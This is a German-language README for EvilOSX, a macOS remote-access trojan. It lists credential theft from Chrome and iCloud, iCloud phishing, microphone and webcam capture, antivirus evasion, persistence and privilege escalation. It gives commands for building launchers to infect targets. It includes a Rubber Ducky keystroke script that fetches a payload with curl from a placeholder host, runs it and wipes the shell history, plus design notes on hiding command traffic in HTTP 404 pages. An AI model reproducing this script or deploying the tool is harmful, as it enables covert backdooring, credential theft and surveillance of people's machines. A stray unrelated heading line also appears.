EvilOSX
Marco Generator von Cedric Owens
Dieses Projekt ist nicht mehr aktiv
Funktionen
- Emuliere eine Terminal-Instanz
- Einfaches erweiterbares Modul-System
- Keine Bot-Abhängigkeiten (reines Python)
- Von Antiviren unerkannt (OpenSSL AES-256 verschlüsselte Payloads)
- Persistent
- GUI- und CLI-Unterstützung
- Chrome-Passwörter abrufen
- iCloud-Token und Kontakte abrufen
- Zwischenablage abrufen/überwachen
- Browserverlauf abrufen (Chrome und Safari)
- Phishing für iCloud-Passwörter über iTunes
- iTunes (iOS) Backup-Aufzählung
- Mikrofon aufnehmen
- Desktop-Screenshot oder Bild mit der Webcam aufnehmen
- Versuch, root über lokale Privilegieneskalation zu erlangen
Verwendung
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
Warnung: Da Payloads einzigartig für das Zielsystem erstellt werden (automatisch durch den Server), muss der Server laufen, wenn ein Bot zum ersten Mal eine Verbindung herstellt.
Fortgeschrittene Benutzer
Es gibt auch eine CLI für diejenigen, die dies über SSH verwenden möchten:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
Screenshots

Motivation
Dieses Projekt wurde erstellt, um mit meinem Rubber Ducky verwendet zu werden, hier das einfache Skript:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- Es dauert etwa 10 Sekunden, um jeden entsperrten Mac zu backdoor, was...... nett ist
- Terminal wird absichtlich so geschrieben, auf manchen Systemen findet Spotlight das Terminal sonst nicht.
- Um den Tastatur-Einrichtungsassistenten zu umgehen, ändern Sie die VID&PID, die hier zu finden sind.
Aluminum Keyboard (ISO) ist wahrscheinlich das, wonach Sie suchen.
Versionierung
EvilOSX wird nach Möglichkeit unter den Semantic Versioning-Richtlinien gepflegt.
Server- und Bot-Releases werden im folgenden Format nummeriert:
Und nach den folgenden Richtlinien erstellt:
- Bricht die Abwärtskompatibilität (mit älteren Bots) -> Erhöhung der Major-Version
- Neue Ergänzungen ohne Bruch der Abwärtskompatibilität -> Erhöhung der Minor-Version
- Fehlerbehebungen und sonstige Änderungen -> Erhöhung der Patch-Version
Weitere Informationen zu SemVer finden Sie unter https://semver.org/.
Designhinweise
- Das Infizieren eines Rechners ist in drei Teile aufgeteilt:
- Ein Launcher wird auf dem Zielrechner ausgeführt, dessen einziges Ziel es ist, den Stager zu starten
- Der Stager fragt den Server nach einem Loader, der festlegt, wie eine Payload geladen wird
- Der Loader erhält eine einzigartig verschlüsselte Payload und wird dann zurück an den Stager gesendet
- Der Server verbirgt seine Kommunikation, indem er Nachrichten sendet, die in HTTP 404-Fehlerseiten versteckt sind (von BlackHat's "Hiding In Plain Sight")
- Befehlsanfragen werden über eine GET-Anfrage vom Server abgerufen
- Befehlsantworten werden über eine POST-Anfrage an den Server gesendet
- Module nutzen die dynamische Natur von Python aus, sie werden einfach über das Netzwerk mit zlib komprimiert gesendet, zusammen mit allen Konfigurationsoptionen
- Da der Bot nur mit dem Server kommuniziert und nie umgekehrt, hat der Server keine Möglichkeit zu wissen, wann ein Bot offline geht
Probleme
Zögern Sie nicht, Probleme oder Funktionswünsche hier einzureichen.
Mitwirken
Eine einfache Anleitung zum Erstellen von Modulen finden Sie hier.
Danksagungen
- Das großartige Empire Projekt
- Ein Gruß an Patrick Wardle für seine großartigen Vorträge, schaut euch Objective-See an
- manwhoami für seine Projekte: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
(inzwischen gelöscht... lass es mich wissen, falls du wieder auftauchst)
- Das slowloris-Modul ist größtenteils von PySlowLoris kopiert
- urwid und dieser Code, der mir viel Zeit mit der CLI gespart hat
- Logo erstellt von motusora
Lizenz
GPLv3